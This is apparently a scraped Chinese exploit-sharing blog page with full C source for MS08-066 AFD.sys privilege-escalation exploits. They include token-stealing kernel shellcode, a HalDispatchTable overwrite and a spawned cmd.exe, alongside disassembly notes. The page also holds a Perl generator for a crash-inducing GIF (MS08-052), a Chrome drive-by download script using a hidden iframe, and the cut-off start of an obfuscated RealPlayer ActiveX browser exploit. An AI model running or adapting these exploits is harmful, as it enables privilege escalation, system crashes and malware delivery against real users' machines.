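ULONG GetServiceTable(PVOID pImageBase, ULONG Address)
{
    PIMAGE_NT_HEADERS pNtHeaders;
    PIMAGE_BASE_RELOCATION pBaseRelocation;
    PIMAGE_FIXUP_ENTRY pFixupEntry;
    ULONG RelocationTableSize = 0;
    ULONG Consumed = 0;
    ULONG Offset, i, Entries, VirtualAddress, Rva;

    Offset = Address - (ULONG)pImageBase;
    pNtHeaders = (PIMAGE_NT_HEADERS)RtlImageNtHeader(pImageBase);
    pBaseRelocation = (PIMAGE_BASE_RELOCATION)RtlImageDirectoryEntryToData(pImageBase, TRUE, IMAGE_DIRECTORY_ENTRY_BASERELOC, &RelocationTableSize);
    if(pBaseRelocation == NULL || pNtHeaders == NULL)
        return 0;

    while(Consumed + sizeof(IMAGE_BASE_RELOCATION) <= RelocationTableSize &&
          pBaseRelocation->VirtualAddress != 0 &&
          pBaseRelocation->SizeOfBlock >= sizeof(IMAGE_BASE_RELOCATION) &&
          Consumed + pBaseRelocation->SizeOfBlock <= RelocationTableSize)
    {
        pFixupEntry = (PIMAGE_FIXUP_ENTRY)((PUCHAR)pBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));
        Entries = (pBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_FIXUP_ENTRY);

        for(i = 0; i < Entries; i++, pFixupEntry++)
        {
            if(pFixupEntry->Type != IMAGE_REL_BASED_HIGHLOW)
                continue;

            VirtualAddress = pBaseRelocation->VirtualAddress + pFixupEntry->Offset;
            /* Relocated dword minus the preferred ImageBase gives the RVA it points at. */
            Rva = *(PULONG)((PUCHAR)pImageBase + VirtualAddress) - (ULONG)pNtHeaders->OptionalHeader.ImageBase;
            if(Rva != Offset)
                continue;

            /* The two bytes before the disp32 must be C7 05 (little-endian 0x05c7):
             * "mov dword ptr [disp32], imm32".  The imm32 follows the disp32. */
            if(*(PUSHORT)((PUCHAR)pImageBase + VirtualAddress - 2) == 0x05c7)
                return *(PULONG)((PUCHAR)pImageBase + VirtualAddress + 4) - pNtHeaders->OptionalHeader.ImageBase;
        }

        Consumed += pBaseRelocation->SizeOfBlock;
        pBaseRelocation = (PIMAGE_BASE_RELOCATION)((PUCHAR)pBaseRelocation + pBaseRelocation->SizeOfBlock);
    }

    return 0;
}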

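/* Entry point.
 *
 * Flow:
 *   1. Resolve the ntdll natives, read our PROCESS_BASIC_INFORMATION (parent
 *      PID) and find the live kernel's load address (GetKernelBase).
 *   2. Pick the System PID and EPROCESS.Token offset for the OS version.
 *   3. LoadLibrary the kernel file only to resolve HalDispatchTable's RVA, then
 *      rebase it to the live kernel.  The slot to redirect is
 *      HalDispatchTable+4, which KeQueryIntervalProfile calls through.
 *   4. Allocate a 0x90-filled region around 0x7fb0, fill the parameter area
 *      behind the 0x90cccc90 marker of shellcode[] and copy the result to 0x8000.
 *   5. Connect to 127.0.0.1:445 (port 0x1bd) so the socket has a peer address;
 *      no listener thread is needed because that port is normally open locally.
 *   6. IOCTL 0x1203F (AfdGetRemoteAddress) with OutputBufferLength 0 and
 *      OutputBuffer = HalDispatchTable+1.  Per the disassembly on this page the
 *      driver records STATUS_BUFFER_TOO_SMALL but still copies the peer
 *      sockaddr_in {AF_INET, htons(0x1bd), 127.0.0.1} = 02 00 01 bd 7f 00 00 01,
 *      so HalDispatchTable+4 receives bd 7f 00 00 = 0x7fbd, inside the NOP
 *      region that slides into the shellcode at 0x8000.  The bytes either side
 *      of the slot are clobbered too; presumably the payload repairs them using
 *      the HookAddress/4 it is given (not verified here).
 *   7. ZwQueryIntervalProfile makes the kernel call through the slot.
 *
 * All addresses and offsets assume 32-bit Windows 2000/XP/2003 (see the
 * switch).  Returns 0 once the sequence completed, 1 on a usage error;
 * ErrorQuit() terminates on other failures. */
int main(int argc, char* argv[])
{
    PULONG pStoreBuffer, pShellcode;
    PUCHAR pRestoreBuffer;
    PROCESS_BASIC_INFORMATION pbi;
    KPROFILE_SOURCE ProfileSource;
    OSVERSIONINFO ovi;
    char KernelName[64];
    ULONG j, k, KernelBase, buf[64];
    ULONG HookAddress, SystemId, TokenOffset;
    ULONG HDTOffset, AllocationSize;
    ULONG Result;
    HMODULE hKernel;
    WSADATA wsad;
    SOCKET sockfd;
    struct sockaddr_in saddr;

    printf("\n MS08-0xx Windows Kernel Ancillary Function Driver Local Privilege Escalation Vulnerability Exploit \n\n");
    printf("\t Create by SoBeIt. \n\n");
    if(argc != 1)
    {
        printf(" Usage:%s\n\n", argv[0]);
        return 1;
    }

    GetFunction();

    if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
        ErrorQuit("ZwQueryInformationProcess failed\n");

    KernelBase = GetKernelBase(KernelName);
    if(!KernelBase)
        ErrorQuit("Unable to get kernel base address.\n");

    printf("Kernel base address: %x\n", KernelBase);

    ovi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

    if(!GetVersionEx(&ovi))
        ErrorQuit("GetVersionEx failed.\n");

    if(ovi.dwMajorVersion != 5 && ovi.dwMajorVersion != 6)
        ErrorQuit("Not Windows NT family OS.\n");

    printf("Major Version:%d Minor Version:%d\n", ovi.dwMajorVersion, ovi.dwMinorVersion);
    /* System PID and EPROCESS.Token offset per build.  NOTE(review): only the
     * minor version is consulted, so 6.0 (Vista) takes the Windows 2000 branch;
     * these tables only cover 5.x. */
    switch(ovi.dwMinorVersion)
    {
    case 0: //Windows2000
        SystemId = 8;
        TokenOffset = 0x12c;
        break;

    case 1: //WindowsXP
        SystemId = 4;
        TokenOffset = 0xc8;
        break;

    case 2: //Windows2003
        SystemId = 4;
        TokenOffset = 0xd8;
        break;

    default:
        SystemId = 4;
        TokenOffset = 0xc8;
    }

    hKernel = LoadLibrary(KernelName);
    if(hKernel == NULL)
        ErrorQuit("LoadLibrary failed.\n");

    printf("Load Base:%x\n", (ULONG)hKernel);
    HDTOffset = (ULONG)GetProcAddress(hKernel, "HalDispatchTable");
    if(HDTOffset == 0)
        ErrorQuit("GetProcAddress(HalDispatchTable) failed.\n");
    /* Rebase from the user-mode mapping to where the live kernel is loaded. */
    HDTOffset += KernelBase - (ULONG)hKernel;
    FreeLibrary(hKernel);
    printf("HalDispatchTable Offset:%x\n", HDTOffset);
    HookAddress = (ULONG)(HDTOffset + 4);
    printf("NtQueryIntervalProfile function entry address:%x\n", HookAddress);

    AllocationSize = 0x1000;
    pStoreBuffer = (PULONG)0x7fb0;
    if(ZwAllocateVirtualMemory((HANDLE)0xffffffff, (PVOID *)&pStoreBuffer, 0, &AllocationSize,
                               MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE))
        ErrorQuit("ZwAllocateVirtualMemory failed.\n");
    /* The call rounds the base down and the size up and writes both back.  The
     * region must cover 0x7fbd (the value that lands in HalDispatchTable+4)
     * through the shellcode copied to 0x8000 below. */
    if((ULONG)pStoreBuffer > 0x7fbd ||
       (ULONG)pStoreBuffer + AllocationSize < 0x8000 + (sizeof(shellcode) - 1))
        ErrorQuit("Allocated region does not cover 0x7fbd..0x8000+shellcode.\n");

    pRestoreBuffer = malloc(0x100);
    if(pRestoreBuffer == NULL)
        ErrorQuit("malloc failed.\n");

    memset(pStoreBuffer, 0x90, AllocationSize);

    /* Locate the 0x90cccc90 ("\x90\xcc\xcc\x90") marker; k becomes the dword
     * index just past it, where the parameter block goes. */
    pShellcode = (PULONG)shellcode;
    for(k = 0; k < (sizeof(shellcode) - 1) / 4 && pShellcode[k] != 0x90cccc90; k++)
        ;
    if(k >= (sizeof(shellcode) - 1) / 4)
        ErrorQuit("Shellcode parameter marker not found.\n");
    k++;

    for(j = 0; kfunctions[j][0] != '\x0'; j++)
        buf[j] = ComputeHash((char *)kfunctions[j]);

    buf[j++] = pbi.InheritedFromUniqueProcessId; /* parent PID */
    buf[j++] = SystemId;
    buf[j++] = (ULONG)pRestoreBuffer;
    buf[j++] = HookAddress;
    buf[j++] = 0x04;
    buf[j++] = TokenOffset;

    if((k + j) * 4 > sizeof(shellcode) - 1)
        ErrorQuit("Shellcode parameter area is too small.\n");
    memcpy((char *)(pShellcode + k), (char *)buf, j * 4);
    memcpy((PUCHAR)0x8000, shellcode, sizeof(shellcode) - 1);

    if(WSAStartup(MAKEWORD(2, 2), &wsad) != 0)
        ErrorQuit("WSAStartup failed.\n");

    if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
        ErrorQuit("socket failed.\n");

    /* Peer 127.0.0.1:445.  This sockaddr_in is what AfdGetRemoteAddress copies. */
    saddr.sin_family = AF_INET;
    saddr.sin_port = htons(0x1bd);
    saddr.sin_addr.s_addr = 0x100007f;

    if(connect(sockfd, (struct sockaddr *)&saddr, sizeof(struct sockaddr)))
        ErrorQuit("connect failed.\n");

    /* Output buffer length 0 is deliberate (triggers the unchecked copy); the
     * call reports failure to user mode even when the write happened, so its
     * return value is intentionally not checked. */
    DeviceIoControl((HANDLE)sockfd, 0x1203F, NULL, 0, (PVOID)(HookAddress - 3), 0, &Result, NULL);

    ProfileSource = ProfileTotalIssues;
    ZwQueryIntervalProfile(ProfileSource, &Result);

    closesocket(sockfd);
    WSACleanup();
    /* pRestoreBuffer is intentionally not freed: its address was handed to the
     * kernel payload and what it still references is not verified here. */

    printf("Exploit finished.\n");
    return 0;
}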


MS08-066 AFD.sys Local Privilege Escalation Exploit (POC)

2008年10月16日 Chinadu 没有评论

文章作者:Eros412
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

MS Bulletin : http://www.microsoft.com/technet/security/Bulletin/MS08-066.mspx

**********计算IoControlCode过程**********

.text:00010B9F mov eax, [edx+0Ch] ; edx=CurrentStackLocation
.text:00010BA2 push esi
.text:00010BA3 mov esi, ecx
.text:00010BA5 mov ecx, eax ;ecx=IoControlCode
.text:00010BA7 shr ecx, 2
.text:00010BAA and ecx, 3FFh
.text:00010BB0 push edi
.text:00010BB1 mov edi, _AfdImmediateCallDispatch[ecx*4] ; ecx=0x0F

.data:00011FF8 _AfdImmediateCallDispatch dd 0 ; DATA XREF: AfdDispatchImmediateIrp(x,x)+12r
.data:00011FF8 ; AfdFastIoDeviceControl(x,x,x,x,x,x,x,x,x)+7Ar

.data:00012034 off_12034 dd offset AfdGetRemoteAddress(x,x,x,x,x,x,x,x)
.data:00012034 ; DATA XREF: .data:0001213Co

//0x12034-0x11FF8= 0x3C,所以ecx=(0x3C/4)=0x0F

PAGEAFD:0001AE64 cmp _AfdIoctlTable[esi], edi ;
PAGEAFD:0001AE6A jnz loc_20510
PAGEAFD:0001AE6A
PAGEAFD:0001AE70 mov [edx+1], al
PAGEAFD:0001AE73 mov esi, _AfdIrpCallDispatch[esi]

//我们从_AfdIoctlTable寻找一个运算后==0x0F的值

kd>dd _AfdIoctlTable
f81c3108 00012003 00012007 0001200b 0001200c
f81c3118 00012010 00012017 0001201b 0001201f
f81c3128 00012023 00012024 0001202b 0001202f
f81c3138 00012033 00012037 0001203b 0001203f
f81c3148 00012043 00012047 0001204b 0001204f

//答案是0001203f:(0x1203f >> 2) & 0x3FF == 0x0F,正好索引到 off_12034 = AfdGetRemoteAddress

***********************************************

*****************溢出过程**********************

PAGE:000171B5 cmp [ebp+OutputBufferLength], eax
PAGE:000171B8 jnb short loc_171C3
PAGE:000171B8
PAGE:000171BA mov [ebp+var_24], 80000005h
PAGE:000171C1 jmp short loc_171C9---------------------------------------------〉big problem!!! (when OutputBufferLength is too small only STATUS_BUFFER_TOO_SMALL, 0x80000005, is recorded in var_24; the jump then joins the common path, so the length check never short-circuits the copy that starts at 000171E0 below)
PAGE:000171C1
PAGE:000171C3 ; ---------------------------------------------------------------------------
PAGE:000171C3
PAGE:000171C3 loc_171C3: ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+50j
PAGE:000171C3 mov [ebp+OutputBufferLength], eax
PAGE:000171C6 mov [ebp+var_24], esi
PAGE:000171C6
PAGE:000171C9
PAGE:000171C9 loc_171C9: ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+59j
PAGE:000171C9 mov [ebp+ms_exc.disabled], esi

PAGE:000171E0 movzx ecx, word ptr [ebx+5Ah] ;
PAGE:000171E4 movzx esi, word ptr [ebx+58h] ;
PAGE:000171E8 add esi, [ebp+ebx_70h] ;
PAGE:000171EB mov edi, [ebp+OutputBuffer]-----------------------〉控制的OutputBuffer地址
PAGE:000171EE mov eax, ecx
PAGE:000171F0 shr ecx, 2
PAGE:000171F3 rep movsd--------------------------〉其实就是把 sockaddr_in(这个 socket 的对端地址,即 AfdGetRemoteAddress 要返回的内容)拷贝到
OutputBuffer,并且不受 OutputBufferLength 限制。OutputBuffer==HalDispatchTable 时:
[HalDispatchTable+0x00]==sin_family (AF_INET == 0x0002)
[HalDispatchTable+0x02]==sin_port (0x8888)
[HalDispatchTable+0x04]==sin_addr.s_addr (127.0.0.1 == 0x0100007F)

kd>dd HalDispatchTable
80538ab8 88880002 0100007f cccccccc cccccccc

PAGE:000171F5 mov ecx, eax ;
PAGE:000171F7 and ecx, 3 ;
PAGE:000171FA rep movsb

***********************************************

代码:

#include <Winsock2.h>
#include <stdio.h>
#include <windows.h>
// Ring-0 payload reached once HalDispatchTable+4 has been redirected into the
// user-mode NOP region allocated in main().  Decoding the bytes (32-bit):
//   nop x6
//   mov  eax, 0FFDFF124h      ; KPCR+0x124 = KPRCB.CurrentThread on XP 32-bit
//   mov  eax, [eax]           ; current ETHREAD
//   mov  esi, [eax+220h]      ; ETHREAD.ThreadsProcess -> current EPROCESS
//   mov  eax, esi
// next:
//   mov  eax, [eax+88h]       ; EPROCESS.ActiveProcessLinks.Flink
//   sub  eax, 88h             ; back to the EPROCESS base
//   mov  edx, [eax+84h]       ; EPROCESS.UniqueProcessId
//   cmp  edx, 4               ; PID 4 == System
//   jnz  next
//   mov  eax, [eax+0C8h]      ; System's EPROCESS.Token
//   mov  [esi+0C8h], eax      ; replace our own Token with it
//   ret  8
// Field names/offsets are the Windows XP SP2 32-bit layout (the same build the
// hard-coded HalDispatchTable address 0x80538ab8 in main() belongs to); they
// differ on other builds -- confirm against the target kernel before reuse.
char ShellCode[]="\x90\x90\x90\x90\x90\x90\xB8\x24\xF1\xDF"
"\xFF\x8B\x00\x8B\xB0\x20\x02\x00\x00\x8B"
"\xC6\x8B\x80\x88\x00\x00\x00\x2D\x88\x00"
"\x00\x00\x8B\x90\x84\x00\x00\x00\x83\xFA"
"\x04\x75\xEA\x8B\x80\xC8\x00\x00\x00\x89"
"\x86\xC8\x00\x00\x00\xC2\x08\x00";

// Handshake events shared between main() and the FooServer listener thread.
typedef struct _THREAD_PARAMS
{
HANDLE hInitEvent;   // set by FooServer once its listening socket is ready for connect()
HANDLE hReadyEvent;  // set by main() when FooServer may close its sockets and exit
} THREAD_PARAMS, *PTHREAD_PARAMS;

// Prototypes for the two ntdll natives main() resolves with GetProcAddress.
// NtQueryIntervalProfile is the user-reachable syscall whose kernel side calls
// through HalDispatchTable+4 (see the disassembly note in main()).
typedef DWORD (WINAPI *PNTALLOCATE)(        IN HANDLE ProcessHandle,
IN OUT PVOID            *BaseAddress,   // in: requested base, out: actual base
IN ULONG                ZeroBits,
IN OUT PULONG           RegionSize,     // in: requested size, out: rounded size
IN ULONG                AllocationType,
IN ULONG                Protect );

typedef DWORD (WINAPI *PNTQUERYINTERVAL)(  ULONG ProfileSource,PULONG          Interval );

#pragma comment (lib, "ws2_32.lib")

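// Listener thread: accepts exactly one loopback connection on 127.0.0.1:0x8888 so
// that main()'s client socket has a remote address (127.0.0.1:0x8888) for
// AfdGetRemoteAddress to copy.  hInitEvent is signalled only after listen() has
// succeeded -- the original signalled right after bind(), so main()'s connect()
// could race a bound-but-not-yet-listening socket and be refused.  Both sockets
// are kept open until hReadyEvent is set.
// Returns a thread exit code (0 on success, 1 on any socket failure) as
// LPTHREAD_START_ROUTINE expects; the cast in main() is unaffected.
DWORD WINAPI FooServer(LPVOID pParam)
{
    PTHREAD_PARAMS lParams = (PTHREAD_PARAMS)pParam;
    SOCKET tcp_socket = INVALID_SOCKET;
    SOCKET local_client = INVALID_SOCKET;
    sockaddr_in localonly;
    sockaddr_in remote;
    int remoteLen = sizeof(remote);

    memset(&localonly, 0, sizeof(localonly));
    localonly.sin_family = AF_INET;
    localonly.sin_addr.s_addr = inet_addr("127.0.0.1");
    localonly.sin_port = htons(0x8888);

    tcp_socket = socket(AF_INET, SOCK_STREAM, 0);
    if (tcp_socket == INVALID_SOCKET ||
        bind(tcp_socket, (sockaddr*)&localonly, sizeof(localonly)) == SOCKET_ERROR ||
        listen(tcp_socket, 2) == SOCKET_ERROR)
    {
        printf("\n\t-> listener setup failed: %d\n", WSAGetLastError());
        if (tcp_socket != INVALID_SOCKET)
            closesocket(tcp_socket);
        // Wake main() anyway so it does not block forever on hInitEvent; its
        // connect() then fails instead of hanging.
        SetEvent(lParams->hInitEvent);
        return 1;
    }
    SetEvent(lParams->hInitEvent);

    local_client = accept(tcp_socket, (struct sockaddr*)&remote, &remoteLen);
    if (local_client == INVALID_SOCKET)
    {
        printf("\n\t-> accept failed: %d\n", WSAGetLastError());
        closesocket(tcp_socket);
        return 1;
    }
    printf("\n\t-> Incoming connection: %s\n\n", inet_ntoa(remote.sin_addr));

    WaitForSingleObject(lParams->hReadyEvent, INFINITE);
    closesocket(local_client);
    closesocket(tcp_socket);
    return 0;
}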

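// Entry point.  Sequence:
//   1. Allocate a 0x90-filled region at 0x01000000 and place ShellCode at +0x100.
//   2. Start FooServer (loopback listener) and connect a client socket to it, so
//      the client socket's peer address is 127.0.0.1:0x8888.
//   3. Issue IOCTL 0x1203f (AfdGetRemoteAddress) on that socket with
//      OutputBufferLength == 0 and OutputBuffer == nt!HalDispatchTable.  Per the
//      disassembly above the driver records STATUS_BUFFER_TOO_SMALL but copies the
//      peer sockaddr_in anyway, so HalDispatchTable+4 becomes sin_addr.s_addr ==
//      0x0100007F, inside the NOP region, which slides into ShellCode.
//   4. NtQueryIntervalProfile makes the kernel call through HalDispatchTable+4.
//   5. Spawn cmd.exe, which inherits the token ShellCode installed.
// Hard-coded for Windows XP SP2 32-bit (HalDispatchTable == 0x80538ab8).
// Returns 0 on completion, 1 if any setup step fails.
int main () {

    printf("=====================================================================   \n");
    printf("\t\tMS08-066  AFD.sys Local Privilege Escalation Exploit  (POC)   \n");
    printf("\t\t    Coded and Modified by :Eros412               \n");
    printf("\t\t   Special Thanks to : Ruben Santamarta       \n");
    printf("=====================================================================   \n");

    ULONG result;
    int status;
    PROCESS_INFORMATION pi;
    STARTUPINFOA stStartup;
    // nt!HalDispatchTable on the target build (kd> dd HalDispatchTable -> 80538ab8).
    // KeQueryIntervalProfile dispatches through HalDispatchTable+4:
    //   8062cdc2 ff15bc8a5380    call    dword ptr [nt!HalDispatchTable+0x4 (80538abc)]
    // so that slot is what the overwrite redirects.  Adjust for any other build.
    DWORD HookAddress = 0x80538ab8;
    // "127.0.0.1" is 0x0100007F in memory, which is the value that lands in
    // HalDispatchTable+4; the region is therefore requested at 0x01000000 and
    // NOP-filled so that address slides into the payload copied to +0x100.
    PVOID ShellCodeMemory = (PVOID)0x01000000;
    DWORD MemorySize = 0x1000;
    PNTALLOCATE NtAllocateVirtualMemory;
    PNTQUERYINTERVAL NtQueryIntervalProfile;
    THREAD_PARAMS lParams = {0};
    HANDLE hThread;
    char inBuff[0x40];
    char cmdline[] = "cmd.exe";   // CreateProcess may write to lpCommandLine; do not pass a literal
    DWORD junk;
    SOCKET tcp_socket;
    struct sockaddr_in peer;
    WSADATA ws;

    if (WSAStartup(0x0202, &ws) != 0) {
        printf("WSAStartup failed\n");
        return 1;
    }

    NtAllocateVirtualMemory = (PNTALLOCATE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
    NtQueryIntervalProfile = (PNTQUERYINTERVAL)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryIntervalProfile");
    if (NtAllocateVirtualMemory == NULL || NtQueryIntervalProfile == NULL) {
        printf("GetProcAddress on ntdll.dll failed\n");
        WSACleanup();
        return 1;
    }

    status = NtAllocateVirtualMemory((HANDLE)-1,
                                     &ShellCodeMemory,
                                     0,
                                     &MemorySize,
                                     MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
                                     PAGE_EXECUTE_READWRITE);
    // The call writes the rounded base/size back; the trick only works if both
    // 0x0100007F (the sled entry) and 0x01000100 + payload lie inside the region.
    if (status != 0 ||
        (DWORD)ShellCodeMemory > 0x0100007F ||
        (DWORD)ShellCodeMemory + MemorySize < 0x01000100 + sizeof(ShellCode)) {
        printf("NtAllocateVirtualMemory failed or returned an unusable region (status %08x, base %p)\n",
               status, ShellCodeMemory);
        WSACleanup();
        return 1;
    }

    memset(ShellCodeMemory, 0x90, MemorySize);
    // Copy exactly the payload bytes; the original copied 80 bytes from a 59-byte array,
    // reading past the end of ShellCode.
    memcpy((BYTE*)ShellCodeMemory + 0x100, ShellCode, sizeof(ShellCode));
    memset(inBuff, 0x90, sizeof(inBuff));

    lParams.hInitEvent = CreateEvent(0, FALSE, FALSE, 0);
    lParams.hReadyEvent = CreateEvent(0, FALSE, FALSE, 0);
    if (lParams.hInitEvent == NULL || lParams.hReadyEvent == NULL) {
        printf("CreateEvent failed: %lu\n", GetLastError());
        WSACleanup();
        return 1;
    }
    hThread = CreateThread(NULL,
                           0,
                           (LPTHREAD_START_ROUTINE)FooServer,
                           (LPVOID)&lParams,
                           0,
                           NULL);
    if (hThread == NULL) {
        printf("CreateThread failed: %lu\n", GetLastError());
        WSACleanup();
        return 1;
    }

    peer.sin_family = AF_INET;
    peer.sin_port = htons(0x8888);
    peer.sin_addr.s_addr = inet_addr("127.0.0.1");
    tcp_socket = socket(AF_INET, SOCK_STREAM, 0);
    WaitForSingleObject(lParams.hInitEvent, INFINITE);
    if (tcp_socket == INVALID_SOCKET ||
        connect(tcp_socket, (struct sockaddr*)&peer, sizeof(sockaddr_in)) == SOCKET_ERROR) {
        printf("connect to 127.0.0.1:0x8888 failed: %d\n", WSAGetLastError());
        SetEvent(lParams.hReadyEvent);
        WaitForSingleObject(hThread, INFINITE);
        CloseHandle(hThread);
        if (tcp_socket != INVALID_SOCKET)
            closesocket(tcp_socket);
        WSACleanup();
        return 1;
    }

    // OutputBufferLength 0 makes AfdGetRemoteAddress record STATUS_BUFFER_TOO_SMALL
    // yet still copy the peer sockaddr_in to OutputBuffer.  The call therefore
    // reports failure to user mode even when the overwrite happened, so its
    // return value is deliberately not checked.
    DeviceIoControl((HANDLE)tcp_socket,
                    0x1203f,
                    (LPVOID)inBuff, sizeof(inBuff),
                    (LPVOID)HookAddress, 0,
                    &junk,
                    NULL);

    // Kernel: KeQueryIntervalProfile -> call [HalDispatchTable+4] -> 0x0100007F
    // -> NOP sled -> ShellCode.
    NtQueryIntervalProfile(3, &result);

    SetEvent(lParams.hReadyEvent);
    WaitForSingleObject(hThread, INFINITE);
    closesocket(tcp_socket);
    CloseHandle(hThread);
    CloseHandle(lParams.hInitEvent);
    CloseHandle(lParams.hReadyEvent);
    WSACleanup();

    GetStartupInfoA(&stStartup);
    if (!CreateProcessA(NULL,
                        cmdline,
                        NULL,
                        NULL,
                        TRUE,
                        0,
                        NULL,
                        NULL,
                        &stStartup,
                        &pi)) {
        printf("CreateProcess failed: %lu\n", GetLastError());
        return 1;
    }
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    return 0;
}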

Reference:

http://www.milw0rm.com/exploits/6757 - MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin) by Ruben Santamarta
http://www.whitecell.org/list.php?id=60 - Windows XP 核心驱动 AFD.sys 本地权限提升漏洞分析(ms08066) by Polymorphours

http://blogs.technet.com/swi/archive/2008/10/14/ms08-066-how-to-correctly-validate-and-capture-user-mode-data.aspx


MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin)

2008年10月16日 Chinadu 没有评论

Hi,

I have just uploaded a k-plugin for Kartoffel, which exploits a flaw
patched in the recent MS08-066 bulletin.

http://kartoffel.reversemode.com/downloads.php
backup: http://milw0rm.com/sploits/2008-afd_plugin.zip

For those researchers interested in digging a little bit more into this
flaw, just take a look at afd!AfdGetRemoteAddress and/or check this out

http://blogs.technet.com/swi/archive/2008/10/14/ms08-066-how-to-correctly-validate-and-capture-user-mode-data.aspx

Regards,
Rubén.

# milw0rm.com [2008-10-15]


MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046)

2008年10月12日 Chinadu 没有评论

EMR_SETICMPROFILEA Heap Overflow DOS

By Ac!dDrop

related to MS08-046

Tested on windows Xp professional Sp2
mscms.dll 5.1.2600.2709
gdi32.dll 5.1.2600.2818

Causes Windows explorer and Internet explorer to crash.

You can run arbitrary code.

http://milw0rm.com/sploits/2008-emf_MS08-046.rar

# milw0rm.com [2008-10-12]


MS Windows GDI+ Proof of Concept (MS08-052) #2

2008年10月12日 Chinadu 没有评论

Operating System: XP SP2
Gdiplus.dll Version: 5.1.3102.2180

Credit:

John Smith,
Evil Fingers

GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt

PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt

http://www.evilfingers.com/patchTuesday/PoC.php
============================================================================================================


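#!/usr/bin/perl
#
# MS08-052 (GDI+) GIF proof-of-concept: writes crash.gif.
#
# The byte stream is the same as the original hand-written listing, but the
# long repeated runs are expressed with string repetition so the layout of
# the file is visible:
#   "GIF89a" header, logical screen descriptor (0x65 x 0x65, flags 0xF7 =>
#   256-entry global colour table), the 768-byte colour table, then two
#   sequences introduced by 0x21 0x2C, each closed by a 0x00 terminator,
#   and finally the 0x3B trailer.
#
# NOTE(review): in the original listing one "\x62" in sub-block #1 of the
# second sequence was split across two lines by wrapping ("\x6" / "2\x61"),
# which Perl would have read as 0x06, newline, "2" -- two bytes longer than
# the other four sub-blocks. That is repaired here: all five are identical.
use strict;
use warnings;

# 17 pairs of 0x21 0xEC (34 bytes); when $pos (0-based pair index) is given,
# that one pair is 0x21 0x2C instead.
sub pairs_21 {
    my ($pos) = @_;
    my @pairs = ("\x21\xEC") x 17;
    $pairs[$pos] = "\x21\x2C" if defined $pos;
    return join '', @pairs;
}

my $header       = "\x47\x49\x46\x38\x39\x61";          # "GIF89a"
my $screen_desc  = "\x65\x00\x65\x00\xF7\x0B\x0B";      # Logical Screen Descriptor
my $colour_table = "\x33" x 768;                        # 256 entries x RGB

# First sequence: sub-blocks #0..#10 are 34-byte runs of 21 EC, with the 0x2C
# pair at index 14, 11, 8 and 5 in blocks #1, #4, #7 and #10 respectively;
# block #11 is 13 pairs followed by 2C 00 00 00 00 0E 01 5A.
my @seq1_positions = (undef, 14, undef, undef, 11, undef, undef, 8, undef, undef, 5);
my $seq1 = join '', map { pairs_21($_) } @seq1_positions;
$seq1 .= "\x21\xEC" x 13;
$seq1 .= "\x2C\x00\x00\x00\x00\x0E\x01\x5A";

# Second sequence: 5 sub-blocks, each 0xEC followed by 236 bytes of "ab"
# (0xEC + 1 = 237 bytes per block).
my $block2 = "\xEC" . ("\x61\x62" x 118);
my $seq2   = $block2 x 5;

my $gif = $header
        . $screen_desc
        . $colour_table
        . "\x21\x2C"      # extension introducer 0x21, label 0x2C
        . $seq1
        . "\x00"          # terminator
        . "\x21\x2C"      # extension introducer 0x21, label 0x2C
        . $seq2
        . "\x00"          # terminator
        . "\x3B";         # trailer

# Three-argument open with a lexical handle, and fail loudly instead of
# silently producing nothing when the file cannot be written.
open(my $out, '>', 'crash.gif') or die "cannot open crash.gif for writing: $!";
binmode($out);
print {$out} $gif;
close($out) or die "cannot close crash.gif: $!";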

# milw0rm.com [2008-10-09]


Google Chrome Browser 0.2.149.27 Automatic File Download Exploit

2008年9月8日 Chinadu 没有评论

Author: nerex
E-mail: nerex[at]live[dot]com

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt.

This proof-of-concept was created for educational purposes only. Use the code at your own risk. The author will not be responsible for any damages.

Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************
 

<script>
// Hidden (0x0) iframe whose source is an executable; on the browser build
// under test the download starts with no user prompt. Written into the page
// with document.write, exactly as the original one-liner did.
var dropUrl = 'http://www.example.com/hello.exe';
document.write('<iframe src="' + dropUrl + '" frameborder="0" width="0" height="0">');
</script>

RealPlayer 最新网马

2007年11月25日 Chinadu 没有评论

<script language="javascript">
// RealPlayer IERPCtl ActiveX (ierpplug.dll) exploit: overflows the playlist
// name passed to Import() (see the NSFocus text further down the page).
// NOTE(review): what follows is the decoded body of an eval("...") call. As
// printed here -- raw newlines and unescaped double quotes inside one
// double-quoted string -- it is not valid JavaScript; it is kept for analysis.
eval("function RealExploit()
{
// Only run on IE 6/7 on an NT 5.x host (2000/XP/2003); bail out otherwise.
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
  return;
if(user.indexOf("nt 5.")==-1)
  return;
// ProgID "IERPCtl.IERPCtl.1" assembled from fragments (presumably to dodge
// simple signature matching).
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
  Real = new ActiveXObject(VulObject);
}catch(error)
{
  return;
}
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
Padding = "";
// 75 06 74 04 = "jne +6 / je +4": a 4-byte stub that is stepped over
// whichever way the flags fall, repeated below to pad up to the return slot.
JmpOver = unescape("%75%06%74%04");
// 32*148 = 4736 filler bytes before the jump stubs.
